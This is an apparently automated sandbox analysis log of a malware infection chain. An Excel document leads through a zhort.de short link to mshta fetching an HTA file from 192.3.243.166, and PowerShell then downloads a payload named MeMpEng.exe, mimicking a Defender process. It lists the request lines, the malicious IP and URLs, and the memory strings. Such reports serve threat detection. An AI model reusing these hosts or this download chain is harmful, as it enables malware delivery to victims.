    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xampp/vcc/ideanetowroking.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.166Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xampp/vcc/ideanetowroking.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.243.166If-Range: "1cadc-620a14e9cef29"
    Source: global trafficHTTP traffic detected: GET /340/MeMpEng.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.166Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xampp/vcc/ideanetowroking.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 27 Aug 2024 02:50:40 GMTConnection: Keep-AliveHost: 192.3.243.166If-None-Match: "1cadc-620a14e9cef29"
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.166
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE898A7018 URLDownloadToFileW,7_2_000007FE898A7018
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECB6B4E1.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6XcI3x HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: zhort.deConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xampp/vcc/ideanetowroking.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.166Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xampp/vcc/ideanetowroking.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.243.166If-Range: "1cadc-620a14e9cef29"
    Source: global trafficHTTP traffic detected: GET /340/MeMpEng.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.166Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xampp/vcc/ideanetowroking.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Tue, 27 Aug 2024 02:50:40 GMTConnection: Keep-AliveHost: 192.3.243.166If-None-Match: "1cadc-620a14e9cef29"
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: global trafficDNS traffic detected: DNS query: zhort.de
    Source: mshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Http://192.3.243.166/xampp/vcc/ideanetowroking.htaA
    Source: mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Http://192.3.243.166/xampp/vcc/ideanetowroking.htaf
    Source: mshta.exe, 0000000C.00000003.460855447.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000468E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/
    Source: mshta.exe, 00000004.00000002.407362361.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.00000000033A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166//
    Source: mshta.exe, 00000004.00000002.407362361.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.00000000033A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/3
    Source: powershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/340/MeMpEng
    Source: powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/340/MeMpEng.exe
    Source: powershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/340/MeMpEng.exeU/
    Source: powershell.exe, 00000007.00000002.426492015.0000000002DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.470282539.0000000002672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/340/MeMpEng.exep
    Source: powershell.exe, 00000007.00000002.428803298.000000001A875000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/340/MeMpEng.exes
    Source: powershell.exe, 00000010.00000002.483569421.000000001AE6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/340/MeMpEng.exesAM
    Source: powershell.exe, 00000010.00000002.483569421.000000001AE6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/340/MeMpEng.exesNMicro#z
    Source: mshta.exe, 0000000C.00000002.461175381.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.hta
    Source: mshta.exe, 00000004.00000003.406507991.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405709089.0000000000128000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406249616.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407210728.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406947877.0000000000111000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.hta$
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.hta...
    Source: mshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.hta7
    Source: mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htaA
    Source: mshta.exe, 0000000C.00000003.460892429.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htaV.
    Source: mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htaZ
    Source: mshta.exe, 0000000C.00000003.458342798.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460919609.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461175381.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htab
    Source: mshta.exe, 00000004.00000003.406772799.0000000002525000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.456153015.00000000034F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htahttp://192.3.243.166/xampp/vcc/ideanetowroking.hta
    Source: mshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000468E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000468E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htaings
    Source: mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htase
    Source: mshta.exe, 0000000C.00000003.458342798.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.166/xampp/vcc/ideanetowroking.htattC:
    Source: mshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460892429.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.0000000004679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C2A9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.428803298.000000001A7B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: mshta.exe, 00000004.00000003.405684824.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003379000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: mshta.exe, 00000004.00000003.406480002.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003384000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003384000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.428803298.000000001A875000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: powershell.exe, 00000007.00000002.426492015.000000000277F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: MeMpEng.exe, 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, MeMpEng.exe, 0000000B.00000000.426144572.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, MeMpEng.exe, 00000014.00000000.467976548.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, MeMpEng.exe, 00000014.00000002.502162914.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, MeMpEng.exe.7.dr, MeMpEng[1].exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000007.00000002.428470828.00000000122F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461450253.000000000462D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.000000000462C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: mshta.exe, 00000004.00000003.406480002.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406197716.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.405684824.0000000003352000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407362361.0000000003352000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.429105773.000000001C315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.460855447.0000000004650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.458414156.000000000464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.461457763.0000000004651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.453929109.000000000464C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
